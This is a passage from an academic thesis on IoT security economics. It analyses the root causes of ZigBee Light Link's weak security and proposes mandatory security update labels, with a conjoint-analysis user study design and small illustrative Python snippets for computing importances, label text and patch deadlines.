Phase 1 – Security Design Trade-Offs. The ZigBee specifications prior to ZigBee 3.0 distinguished between home consumer and business applications. In the case of connected lighting systems, the ZigBee Light Link standard was intended to serve the home consumer market, while another ZigBee application profile, the ZigBee Building Automation standard [326], provides functionality for connected lighting systems in business and industrial settings. The significant differences between these two standards can be found in their security architectures. While ZigBee Building Automation follows the ZigBee Pro specifications and offers the full classical commissioning procedure, which uses a dedicated device, called Trust Center, for key management [336, p.432], the ZigBee Light Link standard aimed to decrease the complexity of the commissioning in order to increase consumer acceptance. Thus, the classical commissioning procedure in the ZigBee Light Link standard lacks the Trust Center and relies on a global non-disclosure agreement (NDA)-protected master key. Attacks against the classical commissioning procedure are known. These attacks exploit fallback mechanisms that are in place to compensate for the lack of the Trust Center [337]. Security weaknesses were also found in the second commissioning mode, the touchlink commissioning procedure. Touchlink commissioning uses the inter-PAN transmission mechanism to join a new device to an existing network, one of the most security-critical operations in ZigBee networks, including the transport of the network key to the joining device.

109 6 Root Cause Analysis of ZigBee’s Insecurity

The concept of inter-PAN frames was adopted from the then already existing ZigBee Smart Energy specifications, a profile targeting smart metering applications. The ZigBee Smart Energy specifications define the purpose of inter-PAN transmissions as a possibility for ZigBee devices to ‘perform limited, insecure, and possibly anonymous exchange of information’ [328, p.81]. An exemplary application utilizes this transmission mechanism for the ‘market requirement to send pricing information to very low cost devices’, e.g., a refrigerator magnet that displays the current energy prices and consumption. The ZigBee Light Link specifications adopted this inter-PAN transmission mechanism to enable the commissioning of networks with constrained devices. Intended use cases are, e.g., a bulb that should be joined to an existing network using a simple remote control. The adoption of these unauthenticated inter-PAN transmissions to reduce the complexity of commissioning procedures, in combination with the usage of signal strength as a physical security measure, resulted in the insecurities presented in [213].

Another critical point is the trust in the safe-keeping of master keys that are shared among multiple manufacturers. Both commissioning procedures of the ZigBee Light Link standard rely on an NDA-protected shared key used to encrypt the network key. Although the distributed security global link key (also known as ZLL link key), used for the classical commissioning (and its successor in ZigBee 3.0: EZ-mode commissioning), is not leaked yet, this can happen anytime. NDA-protected keys can indeed leak as demonstrated by the touchlink preconfigured link key (also known as ZLL master key), which was leaked in March 2015 on Twitter [293].

All these security weaknesses, resulting from over-simplified (and thus insecure) commissioning procedures including master keys and fallback mechanisms, show that trade-offs have been made at the expense of a comprehensive security architecture to allow other manufacturers to adopt this standard easily. At the same time, ZigBee-certified products implementing the more secure ZigBee Building Automation standard have not been released yet. The separation between home consumer and business applications has been discontinued in ZigBee 3.0, while the touchlink commissioning procedure remains an optional feature in ZigBee 3.0.

Phase 2 – Lock the Consumers. In December 2015, Philips (as one of the driving forces behind the ZigBee Light Link standard) presumably tried to lock consumers more tightly to its products. This happened with an update of the Hue app, which locked out products from other vendors like Osram and GE that were not participating in the ‘Friends of Hue’ certification program. The public outcry was so large that Philips reverted this decision after a few days by providing an unscheduled update [235]. Although Philips did not disclose how the lock-out was technically implemented, this mechanism can be seen as a security feature that restricts access to the network to white-listed devices.

110 6.4 Implications of Insecure IoT Products

Consumers’ Difficulties with Assessing Security. As described in the economic theory of ‘the market for lemons’ [6], consumers are unwilling to pay for something they cannot assess, such as security [9]. The ZigBee specifications define security measures that are partly very ineffective. But how can a regular consumer determine which level of security is provided by an IoT product? The security of the ZigBee specifications seems solid at first sight as the specifications apply the well-known encryption and authentication scheme AES-CCM. Assuming a shared network key, an attacker without knowledge of this key is not able to decrypt or manipulate AES-CCM-encrypted messages. Nevertheless, as shown in [337, 248, 213], an attacker is able to gain full control of ZigBee-certified products.

6.4 Implications of Insecure IoT Products

So far, it seems that the development of strong security measures in IoT products mainly leads to competitive disadvantages. From an economic perspective, large investments in security are not necessary as consumers do not reward them. High priorities are being quick to market, providing functional features, and offering easy integration for complementors. One might assume that investments in security save money in the long run: through security breaches, people would lose their trust in the manufacturer and the company's reputation would decrease. But experiences from the past show that many companies that have been affected by trust-losing data breaches do not go out of business, although they may suffer significant short-term consequences [40, 2, 109, 169]. For example, security flaws in connected lighting systems (see [337, 248, 213, 63, 43, 122]) have been disclosed almost since the release of these products, but none of them really affected the attractiveness of this technology or its vendors. From the economic perspective of the manufacturers, there are fewer benefits in strongly securing IoT devices compared to the benefits that arise from shorter development cycles omitting these security measures. From our point of view, this might change in the future, when people start suing manufacturers of insecure IoT products for financial compensation, or governmental regulations demand comprehensive security levels for market entry. Irrespective of the current situation, we state that manufacturers should take into account ethical considerations and act responsibly. Consumers can indeed be harmed through the insecurities of IoT systems, even by connected lighting systems. Blackouts or unintended blinking of lights may not only annoy but also frighten residents. Flickering lights can cause epileptic seizures in epilepsy patients [249, 309]. Insecure IoT systems have been used for large denial-of-service attacks against critical infrastructures [161, 12]. Researchers showed that even a single infected light bulb has the potential to serve as an incubator to spread malware across IoT systems in large areas [248]. All these threats might endanger humans as well as infrastructure. If manufacturers deny their responsibility to protect against such threats, which clearly result from security weaknesses in their products, they might become subject to class action lawsuits. Recently, there have been several class action lawsuits against manufacturers that acted irresponsibly.

111 6 Root Cause Analysis of ZigBee’s Insecurity swagen settled a class action lawsuit on its diesel emissions cheating scandal by paying compensations of 14.7 billion USD [266]. Samsung faced class action lawsuits for the slow replacement of its fire-prone mobile phone model [101]. In another class action lawsuit, Ford is alleged of knowingly releasing a flawed infotainment system [159]. These lawsuits have high economic impacts on manufacturers and could have been avoided by taking responsibility seriously.

6.5 A Road to Improvement

We propose five recommendations to strengthen the security design of future IoT standardization efforts.

6.5.1 Define Precise Security Models

During our research, we realized that most specifications of IoT standards do not define a precise security model. The objective of the security model is to formulate against which threats an IoT system should be protected ('security goals') and who the potential attackers are ('attacker model' or 'threat model'). In fact, this model formulates the goals of the security design, and therefore, it should also be part of the specification. Based on the security model, a security architecture should be developed that considers potential threats comprehensively. Such an architecture provides a significantly smaller attack surface than security architectures designed by experience (or best practices) but without assessing the specific threat conditions of the application. As V. D. Gligor said, referring to security models for wireless ad-hoc networks: "A system without an adversary definition cannot possibly be insecure; it can only be astonishing, and of course astonishment is a much underrated security vice" [105]. As examples, we reviewed the ZigBee Light Link specifications [327], the ZigBee 3.0 base device behavior and cluster library specifications [330, 332], but also the LoRaWAN [183] and the Bluetooth 5.0 specifications [27] regarding security models. These IoT-related standards are widely supported by large alliances and their specifications are released to the public. All of these standards lack definitions of an attacker model as well as of security goals. Although this recommendation demands longer standard development cycles, the process of developing a security model can be designed in a generic way, such that the resulting model can be adapted to different applications with small effort. The development of the ZigBee Light Link standard took more than two years. Compared to this period of time, the discussion and definition of a comprehensive security model should not increase this duration significantly.

6.5.2 Stop Consumer and Business Security Differentiation

As described in Section 6.3, some SDOs tend to distinguish between home consumer and business products. In the ZigBee Light Link standard, the security of home consumer products is based on a weaker security architecture than that of business products of the comparable ZigBee Building Automation standard. If we compare the volume of sold products, more IoT home consumer products than business IoT products are sold: Gartner predicted the installation of around 7 billion consumer IoT devices compared to 4.2 billion business IoT devices in 2018 [99]. Thus, a security breach of a popular IoT home consumer product would affect millions of devices. However, there is no clear line between consumer and business products in IoT technologies. Although the Philips Hue system is intended for home consumer use, it can also be deployed in an industrial context, e.g., to control workflows [126]. Since many IoT systems offer interfaces for third-party applications, the deployment of consumer products in industrial processes is a simple and inexpensive option. In the case of connected lighting systems based on ZigBee Light Link, another reason might be that, to the best of our knowledge, there exists no business product (based on the ZigBee Building Automation standard) that offers similar functionality and flexibility. Thus, we state that the IoT demands high security standards for both consumer and business products.

6.5.3 Add Membership Level for Academic Institutes

We counted the contributions of academic researchers to popular IoT-related standards, assessing as examples the IoT standards mentioned in Section 6.5.1. None of these specifications lists academic institutes as contributors, except for Bluetooth 5.0, which states contributions by the University of Bonn (and NIST). Manufacturers have extensive experience regarding functionality and the needs of the market, which are very important insights. Moreover, we assume that they employ experienced security engineers. However, corporate security engineers might be too aware of the business trade-offs involved in the security design. This conflict of interest may make it difficult for them to insist upon meeting strong security goals. Therefore, an outside view of academic researchers can help in two ways: (1) to better appraise the probabilities of attacks and the consequences of insecure design, and (2) to integrate innovative research solutions into the security design. To achieve academic participation, SDOs should lower the barriers for contribution, e.g., by introducing a membership level for (selected) academic institutes that allows (and potentially pays) academic experts to participate in work groups. While fostering academic participation requires investments in selecting and hiring academic experts, the opportunity of knowledge spillover from academic research can be a valuable enrichment to standardization efforts.

6.5.4 Conduct Security Testing Without Conflict of Interest

During the final certification process, not only the functionality of the product should be tested for compliance; the implementation of the security architecture in software and hardware should also be evaluated with code audits and security-focused penetration tests by external certification labs. Certain attacks [248, 213] on connected lighting systems exploited implementation bugs that could have been avoided through external security testing. However, security testing has potential points of failure: previous investigations [217, 177] showed that vendors often prefer testing and certification labs that perform a relaxed evaluation. Also, testing labs might lose customers if they are too strict and delay the release of products, since their competitors might be more easy-going. Thus, mechanisms must be in place that precisely define the scope of evaluation, the exact testing procedures, and penalties for certification labs that fail to fulfill these requirements. Putting the SDO in charge of supervising the certification labs leads to a conflict of interest: the SDO's economic interest is to bring products to market fast to gain market dominance, which corrupts the motivation for comprehensive and time-consuming security testing. Therefore, an independent entity that is not influenced by economic motivations must be in charge of supervising the certification labs. Conducting these security penetration tests will most likely increase costs and lengthen product development cycles, but it also reduces the probability of expensive replacement and patching of installed devices.

6.5.5 Define and Enforce Update Policy

During the standardization process, not only security mechanisms against currently known attacks should be considered, but also the possibility of upgrading security mechanisms in case novel attacks are disclosed, implementation bugs are discovered, or more efficient security measures have been found. While most current IoT standardization efforts consider update mechanisms, an update policy is usually not defined by the SDO. The update policy defines under what circumstances a product needs to be updated and within which time frame. In addition, this policy should define who takes responsibility for updates if the vendor is no longer able to deliver them. If such an update policy is in place (and executed), then the security of the IoT application should be ensured for its full lifetime. The problem of such an update policy is enforcement: what should be the motivation of the manufacturer to update its legacy products? From the economic perspective, why should companies invest money if there is no profit? Thus, the motivation must be extrinsic. A regulatory paradigm shift might be necessary, such that only vendors that provide lifetime security gain access to the markets. For instance, manufacturers that fail to fulfill their duties in terms of providing updates for their products would not be allowed to receive certification for the release of new products. The SDO cannot be trusted with the enforcement of such an update policy due to its conflict of interest. Hence, an independent entity, which is not driven by economic motivations, is required to enforce this policy.

6.6 Related Work on Security Economics in IoT Standardization

Research on security economics in IoT and standardization has gained little attention so far. In terms of distributed systems, Anderson and Fuloria [10] investigated the security economics of electricity metering. Murdoch et al. [217] analyzed reasons why certified products fail to fulfill standardized security requirements. Levä et al. [176] proposed a framework to analyze the economic feasibility of protocols during standard development. Ray et al. [241] outlined trade-offs between energy and security constraints in the IoT ecosystem. Leverett et al. [177] described problems and opportunities regarding the standardization and certification of IoT applications in terms of safety, security, and privacy. Focusing on the European Union, they proposed to establish institutional resources for regulators and policy-makers. In contrast to our approach, Leverett et al. proposed actions at the state level, while our work investigates the security economics of IoT standardization efforts in the private sector. To the best of our knowledge, we are the first to investigate the root causes of insecurities in a specific IoT standard. Learning from them, we deduce lessons about security economics in IoT standards and recommend principles to improve the outcome of future IoT standardization efforts.

6.7 Conclusion

In the past years, security weaknesses were disclosed in the ZigBee specifications, one of the most popular IoT standards in the domain of smart homes: from leaked master keys and fallback mechanisms to unauthenticated command messages. Similar flaws are not specific to ZigBee but also appear in other IoT standards, e.g., Bluetooth Low Energy [252]. Learning from the security pitfalls of the ZigBee specifications, we analyzed the root causes of these insecurities and found them in the prioritization of market aspects over a comprehensive security design. More focus on designing security measures during IoT standardization efforts is needed to protect against the rising threats that result from billions of interconnected IoT devices.

Chapter 7

Security Update Labels

After investigating IoT security economics in Chapter 6, we propose an approach to overcome the asymmetric information regarding security properties of IoT consumer products between consumers and manufacturers. The objective is to make security an intuitive and comparable feature that can be considered during buying decisions, and as a consequence, has the potential to create incentives for manufacturers to spend more effort on sustainable security. In this chapter, we present our approach and examine the impact with an empirical user study.

Contents

7.1 Introduction ...... 118
7.2 Background and Related Work ...... 120
    7.2.1 Product Labeling ...... 120
    7.2.2 Security & Privacy Labels and Regulatory Approaches ...... 121
    7.2.3 Conjoint Analysis ...... 122
7.3 Security Labels for Consumers ...... 122
    7.3.1 Security Scales for Labeling ...... 123
    7.3.2 Security Update Labels ...... 123
    7.3.3 An Idea for a Regulatory Framework ...... 124
    7.3.4 Concerns towards Security Update Labels ...... 125
7.4 Concept of User Study ...... 126
7.5 Preliminary Studies ...... 128
    7.5.1 Prestudy 1: Selection of Product Categories ...... 128
    7.5.2 Prestudy 2: Definition of Product Attributes and Levels ...... 132
7.6 Conjoint Analysis ...... 136
    7.6.1 Method ...... 136
    7.6.2 Pilot Study ...... 138
    7.6.3 Sample Size ...... 139
    7.6.4 Sample Characteristics ...... 139
    7.6.5 Results ...... 139
    7.6.6 Validity ...... 142
    7.6.7 Segmentation ...... 145
7.7 Discussion ...... 147
7.8 Conclusion ...... 149


7.1 Introduction

Recent academic and industrial user studies [322, 199, 121] document various security concerns regarding the usage of IoT products. These concerns may be fostered by almost daily headlines about revealed security flaws in IoT products. At least since the denial-of-service attacks against Internet infrastructure by the Mirai botnet [12] in 2016, security experts have started to demand regulatory interventions. "Our choice isn't between government involvement and no government involvement", says Bruce Schneier in his testimony before a committee of the U.S. House of Representatives [263], "Our choice is between smarter government involvement and stupider government involvement". Current policy approaches in the U.S. include a bill for establishing guidelines for the acquisition of secure IoT products by governmental agencies [307] as well as a Californian bill [36] obligating manufacturers to equip IoT devices with reasonable security features. In the EU, baseline security recommendations for IoT were published by the European Union Agency for Network and Information Security (ENISA) [79]. A task force from academia, industry, and societal organizations proposed a policy for vulnerability disclosure in the EU that also concerns IoT products [42].

The problem of deficient IoT security can be at least partly attributed to missing economic incentives for manufacturers. To be successful on the market, manufacturers have to attract consumers and complementors [9, 11]. Consumers reward an early market entry and new functional features, while complementors favor systems that allow easy compatibility with their products. These demands contradict a comprehensive security design, which usually adds complexity to systems. In addition, releasing an innovative product to the market requires many resources, and since resources are finite, they are withdrawn from non-functional features, such as comprehensive security mechanisms [208]. The missing incentivization of security in IoT consumer products originates from the consumers' inability to assess and compare security properties of different products. The concept of an asymmetric information barrier between buyers and sellers, which also affects other properties such as energy consumption and product quality, is known in economic theory as 'the market for lemons' [6]. This theory states that consumers are not willing to pay a price premium for something they cannot measure. This applies to security in IoT consumer products: in contrast to so-called search features that can be evaluated by consumers during the buying decision, security is an experience feature that can only be discovered during the usage of a product [219]. In fact, even manufacturers might not have complete knowledge about the strength of their products' security [11]. Reasons might be a lack of experience in designing Internet-connected technologies or the outsourcing of a product's security development to original equipment manufacturers (OEMs).

Firstly, we propose and examine mandatory security update labels, a novel idea for a regulatory framework that complements ongoing regulation efforts. We do not call for security testing and certification to keep "insecure" products off the market. Instead, we explore to which extent market forces can be utilized to elicit manufacturers to continuously and sustainably support their products' software with security updates. Security update labels enable an informed choice regarding security properties of IoT consumer products. They transform the asymmetric information about the manufacturer's willingness to provide security updates into two intuitively assessable and comparable product attributes: the availability period, i.e., for how long the manufacturer guarantees to provide security updates (e.g., 'until 12/2016'), as well as the provisioning time, i.e., within which timeframe after a vulnerability notification a security patch is provided (e.g., 'within 30 days'). These labels are inspired by established regulations, e.g., in the domain of energy efficiency labeling.

Secondly, we empirically examine the impact of security update labels on the consumers’ choice. Although security patching is discussed by experts as one of the most effective countermeasures against insecure IoT devices, the impact of guaranteeing security updates on the consumers’ buying decisions has not been empirically assessed so far. With an interdisciplinary team consisting of researchers from the domains of IoT security, human factors in security, marketing research, and psychology, we conducted a user study with more than 1,400 participants that measured the relative importance of the availability period and provisioning time of security updates for buying decisions. To this end, we used conjoint analysis, a well-established method in marketing research [110, 312], which has also been used in courts to calculate damages of patent and copyright infringements [118]. In a nutshell, a number of fictitious product profiles, each described by a set of attributes, is shown to respondents in multiple iterations. They are asked which of the presented products they would prefer to buy (with the option to refuse buying any of the products). Based on these choice results, conjoint analysis determines a preference model that measures the relative importance and utility of each attribute.

We found that the guarantee of providing security updates has a high impact on buying decisions. We examined two product categories, one with a high and one with a low perceived security risk. Among all assessed product attributes, the availability period of security updates was the most important one: For the product with the high perceived security risk, its relative importance on the overall consumers' choice of 31% is at least twice as high as the importance of other attributes. For the product with the low perceived security risk, availability had a lower relative importance of 20% for the consumers' choice. Additionally, consumers prefer a shorter provisioning time (10 days) over a longer provisioning time (30 days), and dislike longer provisioning times for products with a high perceived security risk. Demographic characteristics play a minor role, while the sensitivity for security risks has an impact on the consumers' choice.

In summary, we propose and empirically analyze security attributes for IoT consumer products that are recognized by consumers and do not require third-party product testing. With this work, we address policymakers and security researchers who are seeking promising directions to foster sustainable security efforts for IoT consumer products.

The remaining part of this chapter is organized as follows: In Section 7.2, we introduce the background on product labeling and conjoint analysis as well as present related work. Then, we describe and discuss the idea of security update labels in Section 7.3. In Section 7.4, we outline the concept of the user study that we conduct to assess the impact of the security update labels. The user study consists of two prestudies that are described in Section 7.5 and a conjoint analysis presented in Section 7.6. We discuss the results of the user study and their implications in Section 7.7. We conclude this chapter in Section 7.8.

7.2 Background and Related Work

We provide background and related work on product labeling, privacy labels, and conjoint analysis in this section.

7.2.1 Product Labeling

Product labeling is used in many countries to inform consumers about intangible features of products and to enable the comparison of products during buying decisions. Hereby, a distinction between marks and labels should be made: Marks are usually pictograms that warn about danger or indicate proper usage, cleaning, and recycling of a product. In contrast, labels include scales, descriptions, and numeric statements that provide specific information about a product's properties. In many cases, these signs are demanded by policy makers, but in some cases they are voluntary and used as marketing tools. The Federal Trade Commission (FTC) issues product labeling policies in the USA, while each member state of the EU runs its own institution that enforces regulations defined by the EU Commission. In the past, a number of product labeling policies have been introduced to reduce information asymmetries between manufacturers and consumers. Prominent examples are energy labels that inform about the energy consumption of particular products. In the USA, designated electronic products, e.g., light bulbs, televisions, and household appliances, must be tagged with labels, as exemplarily depicted in Figure 7.1a, that show the energy consumption and the estimated annual operating costs. These labels were introduced by the FTC with the Energy Labeling Rule [88], a part of the Energy Independence and Security Act of 2007 [179]. In 2010, the EU followed with a similar approach by introducing the Energy Efficiency Directive [76] that demands energy labels, as exemplarily shown in Figure 7.1b, for certain product categories. The EU energy labels are part of the efforts to foster energy-efficient products with the objective to reduce the overall energy consumption of the EU by 20% until 2020 [75]. Prior research on the effectiveness of energy labeling [310, 304, 255] concluded that consumers are aware of these labels, understand them, and that energy labels influence consumers' buying decisions. Inspired by the EU energy labels (cf. Figure 7.1b), the German government [84] evaluated an idea of lifetime labels on electronic products. Their label design showed a color-gradient lifespan between 0 (red) and 20 (green) years. In a user study with a representative sample, discrete-choice experiments (but not conjoint analysis) simulated online shopping scenarios. The authors concluded that while the lifespan attribute was recognized by consumers, its impact on the buying decisions was less than the impact of other product attributes, e.g., price and brand. In contrast to our approach, their label did not concern security features, but the functional lifespan of a product.


Figure 7.1: Examples of mandatory product labels. (a) FTC Energy Label; (b) EU Energy Label.

7.2.2 Security & Privacy Labels and Regulatory Approaches

In academic research, the adaptation of product labels for privacy information has been examined in user studies. Kelley et al. [149, 150] investigated whether food nutrition labels can be adapted to make privacy policies of websites more understandable. Tsai et al. [291] evaluated whether consumers would pay a higher price for a product offered by an online shop with a strict privacy policy as compared to a less privacy-protecting shop. Their results suggest that consumers are willing to pay a price premium for higher privacy if privacy information is salient and understandable. Independently of and concurrently with our work, Emami-Naeini et al. [74] developed a security and privacy label for IoT consumer products. In contrast to our proposal, their label includes ratings that require third-party product testing before release. They tested their label in an interview study with 24 users and a survey with 200 respondents. Emami-Naeini et al. did not conduct a conjoint analysis but directly asked the users to rate the importance of security and privacy for their buying decisions. They concluded that the importance of security and privacy depends on the product category: whereas both are important when buying a home camera or a smart thermostat, they are not important when buying a smart toothbrush. We found a similar effect in our study. Our and their studies complement and validate each other's results using different methods. Mandatory security update labels represent a possible approach to regulate the IoT product market with regard to security. Chattopadhyay et al. [44] consider this economic problem in more depth and analyze the impact of various regulation strategies on consumers' behavior.


7.2.3 Conjoint Analysis

Conjoint analysis is one of the major methods to measure the impact of product attributes on consumers' buying decisions [103]. The basic idea of conjoint analysis is that respondents are asked to state their preference for buying fictitious products. The product profiles are described by a limited set of attributes, e.g., size, color, and price. All further attributes of the product are assumed to be constant. There are different types of conjoint analysis. Among them, choice-based conjoint (CBC) analysis is used in 79% of conjoint surveys [227]. In CBC, which we use in this work as well, the respondents receive multiple (usually randomly generated) subsets of 3 to 5 product profiles (so-called choice sets), of which they select the most desirable product. Considering the overall preference (i.e., the combination of all buying decisions) as the dependent variable and the attributes of the product as independent variables, a conjoint analysis assesses the relative importance of a product's attributes. For example, the relative importance of the attribute 'color' for buying decisions can be assessed. Conjoint analysis also evaluates the importance of the different characteristics of a single attribute, e.g., whether the change of a product's color would have positive or negative effects on the consumers' choice. In the past decades, conjoint analysis has been applied to numerous commercial projects [303] and is by far the most widely used methodology in marketing research to analyze consumer trade-offs in buying decisions [110]. Conjoint analysis is also used in other areas, e.g., to assess patients' preferences in the healthcare sector [251]. Furthermore, it is a recognized methodology to calculate damages of patent and copyright infringement in court cases [118]. A famous example was Apple's $2.5 billion lawsuit against Samsung, in which Apple estimated the financial damages of the alleged patent infringement based on conjoint analysis [261]. Conjoint analysis has also previously been used to investigate the effects of product labels [60, 67, 125] on the consumers' choice. Sammer and Wüstenhagen [255] analyzed the impact of energy labels on the buying decisions concerning light bulbs and washing machines of Swiss consumers. However, we are the first to use conjoint analysis to assess the importance of a security-related label.
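To make the notion of 'relative importance' concrete, the following minimal sketch shows one common way importances are derived once part-worth utilities have been estimated from the choice data: the range of an attribute's level utilities, normalized over all attributes. The attribute names and utility values below are purely illustrative assumptions and are not estimates from this study.

# Minimal sketch: relative attribute importance from (hypothetical) part-worth utilities.
part_worths = {
    "price":        {"100 EUR": 0.60, "120 EUR": 0.20, "140 EUR": -0.30, "160 EUR": -0.50},
    "availability": {"none": -0.80, "until 12/2020": 0.30, "until 12/2024": 0.50},
    "provisioning": {"none": -0.40, "within 10 days": 0.25, "within 30 days": 0.15},
}

def relative_importances(part_worths):
    # Importance of an attribute = range (max - min) of its level utilities,
    # normalized by the sum of ranges over all attributes.
    ranges = {attr: max(levels.values()) - min(levels.values())
              for attr, levels in part_worths.items()}
    total = sum(ranges.values())
    return {attr: r / total for attr, r in ranges.items()}

for attribute, importance in relative_importances(part_worths).items():
    print(f"{attribute}: {importance:.1%}")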

7.3 Security Labels for Consumers

Inspired by the success of existing product labels, we propose a label that enables users to compare security properties during buying decisions. We present the idea of a regulatory framework that accompanies the label, and discuss concerns that finally motivate the user study.


7.3.1 Security Scales for Labeling

Learning from the success of the energy labeling initiatives, we asked how we can use a similar approach for security. First of all, an appropriate scale to measure security properties is required. We need a security scale that

1. can be intuitively understood by consumers, even if they have no security expertise;

2. enables them to easily compare products, as comparison lays the foundation for the choice between products;

3. and finally, does not require third-party product testing for market release.

The last requirement is based on the following considerations: Third-party testing is a long and costly procedure that might considerably delay the release of a new product. This involves the danger that manufacturers would choose testing laboratories that perform a relaxed and fast evaluation [217, 177], which again could lead to a false sense of security. In prior work, a number of security scales have been proposed that could be applied to IoT products. Many of them (e.g., [32, 167]) are based on the Common Vulnerability Scoring System (CVSS) [201] and are used to categorize the seriousness and impact of existing security vulnerabilities. Although CVSS can serve as an indicator of future security properties, it cannot solely measure the current level of product security, as it is based on past vulnerability records. The time-to-compromise (TTC) [178] scale originated from the concept of the working time required to break a physical safe. In terms of IoT consumer products, this metric could measure the time it takes to break the security mechanisms of a product. According to our criteria, TTC is not applicable as it requires a third party to assess the product's security. A security scale might also show the levels of a security certification scheme. However, besides the need for a third party, security certification is not suitable to communicate security levels to consumers, as it might be misleading: whereas consumers may assume that the whole product is certified, in reality only a subset of the components might be certified [217].

7.3.2 Security Update Labels

We conclude that, to the best of our knowledge, there are no suitable approaches to communicate the security level of an IoT product to consumers. And even if manufacturers implemented comprehensive security measures, security flaws in IoT products cannot be fully prevented. Prior research [7, 146] concluded that well-engineered code has an average defect rate of around 2 defects per 1,000 lines of code. If we accept the possibility of security vulnerabilities even in well-designed systems, the best approach would be to continuously support the repair of such defects as soon as they are disclosed. We propose a regulatory framework that requires brand-giving manufacturers to define an update policy for each IoT consumer product with the following properties:

1. Availability period: The availability of security updates determines the absolute timeframe in which the manufacturer ensures the patching of security vulnerabilities in the product’s software. In other words, it defines until which date (for example: ‘12/2024’) the manufacturer contractually warrants to provide security updates.

2. Provisioning time: When a security vulnerability in the software of an IoT consumer product is reported, the manufacturer has to investigate this issue and patch the software if needed. The update policy defines the maximum timeframe (for example: '30 days') within which the manufacturer guarantees to provide software security updates.

Both attributes must be printed as a security update label on each applicable product such that consumers can compare this information when making a buying decision. The label content does not need to be authorized by a third party before the market release, similarly to the mandatory energy labels. If a manufacturer refuses to guarantee security updates, the label should explicitly display 'no security updates guaranteed' or a similar phrase.
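For illustration only, the following sketch models the two label attributes as a small data structure and renders a possible label text, including the fallback phrase for a missing guarantee. The field names and the exact wording are our own assumptions, not a normative label format.

# Illustrative sketch of the two security update label attributes.
from dataclasses import dataclass
from typing import Optional

@dataclass
class SecurityUpdateLabel:
    availability_until: Optional[str]  # e.g. "12/2024"; None if no guarantee is given
    provisioning_days: Optional[int]   # e.g. 30; None if no guarantee is given

    def render(self) -> str:
        if self.availability_until is None or self.provisioning_days is None:
            return "No security updates guaranteed"
        return (f"Security updates guaranteed until {self.availability_until}, "
                f"provided within {self.provisioning_days} days after a vulnerability notification")

print(SecurityUpdateLabel("12/2024", 30).render())
print(SecurityUpdateLabel(None, None).render())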

7.3.3 An Idea for a Regulatory Framework

Following the example of the legislation for energy labeling [76, 88], market surveillance and consumer protection authorities should supervise the implementation of the security update labels, and conduct promotional and educational information campaigns in the introduction phase. We propose that each applicable product displays the label on the packaging, such that it can be considered and compared during buying decisions, and on the device itself to inform the consumer about the guaranteed availability of security updates after deployment. These labels should be mandatory for each consumer product that is able to directly or indirectly (e.g., over Bluetooth) connect to the Internet. The liability should be enforced only between the brand-giving company, which is responsible for the definition of the update policy, and the buyer of the product. All further interactions between the brand-giving company and OEMs or other involved third parties should be regulated by the market. The vulnerability disclosure can be implemented in many ways. An approach might be to set up a public vulnerability reporting platform. This platform could ensure the documentation of the reported vulnerabilities and would act as an information channel where the manufacturer announces the current state of the vulnerability handling to the affected consumers and policy-enforcing entities. The design of such a reporting platform could follow the proposal of the Centre for European Policy Studies [42, p.56] and is out of the scope of this work. Procedures could be implemented based on the established standards for responsible vulnerability disclosure, e.g., ISO/IEC 29147 [140], and vulnerability handling, e.g., ISO/IEC 30111 [139]. When a suspected security vulnerability is found, the reporting entity files a vulnerability report via this platform, which in turn informs the affected manufacturers. After receiving the vulnerability report, the time-to-patch clock starts and the manufacturer investigates whether the vulnerability can be reproduced. If the manufacturer concludes that the reported vulnerability is an actual security flaw, a security patch shall be developed and provided within the guaranteed provisioning time. We propose that consumers have a right to compensation in the following cases:

• The manufacturer does not provide a required security patch within the guaranteed provisioning time.

• The manufacturer provides a security patch, but the patch does not fix the bug, introduces other security problems, or has serious effects on the performance of the product.

For cases of disputes about the effectiveness of provided updates or about whether a bug requires a security patch, policymakers should establish an entity that enforces accountability, judges the claims of the consumers, protects vulnerability reporters, and has the power to sanction manufacturers, similarly to the sanctions imposed by the General Data Protection Regulation (GDPR) in the EU [77, Art.58].
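As a minimal illustration of the time-to-patch bookkeeping and compensation conditions described above: the clock starts when the vulnerability report is received, and the patch must arrive within the guaranteed provisioning time. The function names, dates, and the 30-day guarantee below are example assumptions, not part of the proposed framework.

# Sketch of the provisioning-time deadline and the compensation trigger.
from datetime import date, timedelta
from typing import Optional

def patch_deadline(report_received: date, provisioning_days: int) -> date:
    # The time-to-patch clock starts when the vulnerability report is received.
    return report_received + timedelta(days=provisioning_days)

def compensation_due(report_received: date, provisioning_days: int,
                     patch_released: Optional[date], patch_effective: bool) -> bool:
    # Compensation is due if no patch arrives within the guaranteed window,
    # or if the delivered patch does not actually fix the problem.
    deadline = patch_deadline(report_received, provisioning_days)
    if patch_released is None or patch_released > deadline:
        return True
    return not patch_effective

print(patch_deadline(date(2019, 3, 1), 30))                            # 2019-03-31
print(compensation_due(date(2019, 3, 1), 30, date(2019, 4, 5), True))  # True (patch too late)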

7.3.4 Concerns towards Security Update Labels

The proposal of security update labels might raise the following concerns.

Ineffectiveness. Some security vulnerabilities cannot be patched with updates. For example, a security flaw in the specification of an interconnected system might demand changes in other components that are not maintained by the manufacturer, or the hardware platform of the affected product cannot support the patched software due to memory or computational power constraints. In this case, the proposed label strengthens consumer rights as the consumer is entitled to compensation.

Misuse. Manufacturers might be motivated to spend even fewer resources on the security of their products before releasing them. They might decide that they can always patch the product within a certain timeframe, which means that they could simply outsource the debugging of their products to the consumers. We believe that such behavior would damage user acceptance and the brand image. Furthermore, this practice would lead to high pressure on the manufacturers to deliver numerous security patches within limited time. In another scenario, manufacturers might try to transfer the liability regarding their products to offshore companies. These scenarios should be considered when defining the legislation.


Low User Acceptance. The security update labels could fail as they might not have the expected effect on consumers' buying decisions. Prior user studies [297, 298, 96, 196] outline that consumers tend to be reluctant towards the installation of updates. This behavior results from a lack of clarity about the usefulness of updates as well as from negative update experiences in the past, such as unwanted changes in user interfaces or in functionality. In consequence, the attitude towards security updates is affected as users typically do not differentiate between different types of updates. Therefore, security update labels could have a low user acceptance. Potential moral hazard [232] could also lead to a low user acceptance. In our context, this means that users might not be willing to pay a price premium to protect against security vulnerabilities that will not affect them. The attacks by the Mirai botnet [12] serve as an illustration: thousands of IoT consumer products deployed in Latin America attacked US-based Internet services. In this case, why would a Latin-American consumer pay a price premium for a security update guarantee that protects US businesses? The concerns of ineffectiveness and potential misuse depend on the legislation and the business decisions of particular manufacturers. We leave the investigation of these concerns to future work. In the following, we investigate the concern of low user acceptance by means of a user study.

7.4 Concept of User Study

